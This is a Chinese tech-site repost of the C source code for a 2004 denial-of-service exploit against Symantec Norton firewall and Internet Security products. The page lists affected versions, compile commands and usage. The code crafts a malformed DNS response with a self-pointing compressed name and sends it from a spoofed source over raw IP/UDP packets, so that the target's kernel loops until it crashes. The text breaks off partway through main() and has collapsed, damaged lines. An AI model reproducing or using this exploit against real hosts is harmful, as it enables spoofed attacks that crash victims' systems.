扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
名称:HOD-symantec-firewall-DoS-expl.c:
版本:Version 0.1 coded by houseofdabus
翻译:luoluo
漏洞发现:www.eEye.com
漏洞描述:http://www.eeye.com/html/Research/Advisories/AD20040512B.html
* -------------------------------------------------------------------
* 程序测试:
* - Symantec Norton Personal Firewall 2004
* 受影响产品:
* - Symantec Norton Internet Security 2002
* - Symantec Norton Internet Security 2003
* - Symantec Norton Internet Security 2004
* - Symantec Norton Internet Security Professional 2002
* - Symantec Norton Internet Security Professional 2003
* - Symantec Norton Internet Security Professional 2004
* - Symantec Norton Personal Firewall 2002
* - Symantec Norton Personal Firewall 2003
* - Symantec Norton Personal Firewall 2004
* - Symantec Client Firewall 5.01, 5.1.1
* - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
* - Symantec Norton AntiSpam 2004
* -------------------------------------------------------------------
* 说明:
eEye Digital Security 现已发现在 Symantec 防火墙系列产品中存在的第二个安全漏洞,该漏洞可以被远程探测,并被利用来针对受影响系统进行拒绝服务攻击. 通过发送单个恶意 DNS(UDP 端口 53)响应包给存在漏洞的主机, 攻击者可以使 Symantec DNS 响应确认代码在内核中进入死循环,直至系统崩溃。受攻击主机只能通过物理重启,才能恢复运行.
* -------------------------------------------------------------------
* 编译:
* Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
* Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib
* Linux: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall
* -------------------------------------------------------------------
* 命令行参数/说明:
* HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]
* -fi:IP From (sender) IP address
* -tp:int To (recipient) port number
* -ti:IP To (recipient) IP address
* -n:int Number of times to send message
*
*/
#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
#define MAX_MESSAGE 4068
#define MAX_PACKET 4096
#define DEFAULT_PORT 53
#define DEFAULT_IP "10.0.0.1"
#define DEFAULT_COUNT 1
#ifndef _WIN32
# define FAR
#endif
/* Define the DNS header */
char dnsreply[] =
"\xc9\x9c" /* Transaction ID */
"\x80\x00" /* Flags (bit 15: response) */
"\x00\x01" /* Number of questions */
"\x00\x01" /* Number of answer RRs */
"\x00\x00" /* Number of authority RRs */
"\x00\x00" /* Number of additional RRs */
"\xC0\x0C"; /* Compressed name pointer to itself */
/* Define the IP header */
typedef struct ip_hdr {
unsigned char ip_verlen; /* IP version &length */
unsigned char ip_tos; /* IP type of service */
unsigned short ip_totallength; /* Total length */
unsigned short ip_id; /* Unique identifier */
unsigned short ip_offset; /* Fragment offset field */
unsigned char ip_ttl; /* Time to live */
unsigned char ip_protocol; /* Protocol */
unsigned short ip_checksum; /* IP checksum */
unsigned int ip_srcaddr; /* Source address */
unsigned int ip_destaddr; /* Destination address */
} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;
/* Define the UDP header */
typedef struct udp_hdr {
unsigned short src_portno; /* Source port number */
unsigned short dst_portno; /* Destination port number */
unsigned short udp_length; /* UDP packet length */
unsigned short udp_checksum; /* UDP checksum (optional) */
} UDP_HDR, *PUDP_HDR;
/* globals */
unsigned long dwToIP, // IP to send to
dwFromIP; // IP to send from (spoof)
unsigned short iToPort, // Port to send to
iFromPort; // Port to send from (spoof)
unsigned long dwCount; // Number of times to send
char strMessage[MAX_MESSAGE]; // Message to send
void
usage(char *progname) {
printf("Usage:\n\n");
printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname);
printf(" -fi:IP From (sender) IP address\n");
printf(" -tp:int To (recipient) open UDP port number:\n");
printf(" 137, 138, 445, 500(default)\n");
printf(" -ti:IP To (recipient) IP address\n");
printf(" -n:int Number of times\n");
exit(1);
}
void
ValidateArgs(int argc, char **argv)
{
int i;
iToPort = 500;
iFromPort = DEFAULT_PORT;
dwToIP = inet_addr(DEFAULT_IP);
dwFromIP = inet_addr(DEFAULT_IP);
dwCount = DEFAULT_COUNT;
memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);
for(i = 1; i if ((argv[i][0] == '-') || (argv[i][0] == '/')) { switch (tolower(argv[i][1])) { case 'f': switch (tolower(argv[i][2])) { case 'i': if (strlen(argv[i]) > 4) dwFromIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 't': switch (tolower(argv[i][2])) { case 'p': if (strlen(argv[i]) > 4) iToPort = atoi(&argv[i][4]); break; case 'i': if (strlen(argv[i]) > 4) dwToIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 'n': if (strlen(argv[i]) > 3) dwCount = atol(&argv[i][3]); break; default: usage(argv[0]); break; } } } return; } /* This function calculates the 16-bit one's complement sum */ /* for the supplied buffer */ unsigned short checksum(unsigned short *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(unsigned short); } if (size) { cksum += *(unsigned char *)buffer; } cksum = (cksum >> 16) + (cksum &0xffff); cksum += (cksum >>16); return (unsigned short)(~cksum); } int main(int argc, char **argv) { #ifdef _WIN32 WSADATA wsd; #endif int s; #ifdef _WIN32 BOOL bOpt; #else int bOpt; #endif struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; unsigned long i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf[MAX_PACKET], *ptr = NULL; #ifdef _WIN32 IN_ADDR addr; #else struct sockaddr_in addr; #endif printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n"); printf("Bug discoveried by eEye:\n"); printf("
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。